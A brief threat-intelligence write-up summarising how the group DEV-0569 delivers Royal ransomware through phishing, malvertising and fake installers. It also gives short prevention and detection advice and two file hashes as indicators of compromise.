Analysis
On 17th November 2022, Microsoft security threat intelligence (MSTC) published a blog on threat group DEV-0569 finding new ways to deliver royal ransomware.
The threat groups gain initial access by using malicious links via phishing, Malvertising, blog comments, contact forms, and fake installers, the links lead to sites and download malicious software posing as legitimate software, and the downloads contain signed MSI or VHD files (Bat Loader), then it executes PowerShell or batch script for the discovery, disabling AV, and delivery of additional payload.
The installers launch a PowerShell script and download nircmd utility, then allow the attacker to elevate privileges and deliver additional executables such as gozi trojan, vidar stealer which used telegram to receive command and control information, then the threat group performs staging and execution of the royal ransomware.
Prevention
- Use Antivirus and EDR in all endpoints.
- Take regular backups of end devices to reduce the impact.
Detection
Create rules based on known indicators of threat groups in the SIEM (Security incident event management) tool for detection of threat activity
Indicators of Compromise of Royal Ransomware (IOCs)
• 2598e8adb87976abe48f0eba4bbb9a7cb69439e0c133b21aee3845dfccf3fb8f
• 9db958bc5b4a21340ceeeb8c36873aa6bd02a460e688de56ccbba945384b1926
References
Microsoft Security
Fortinet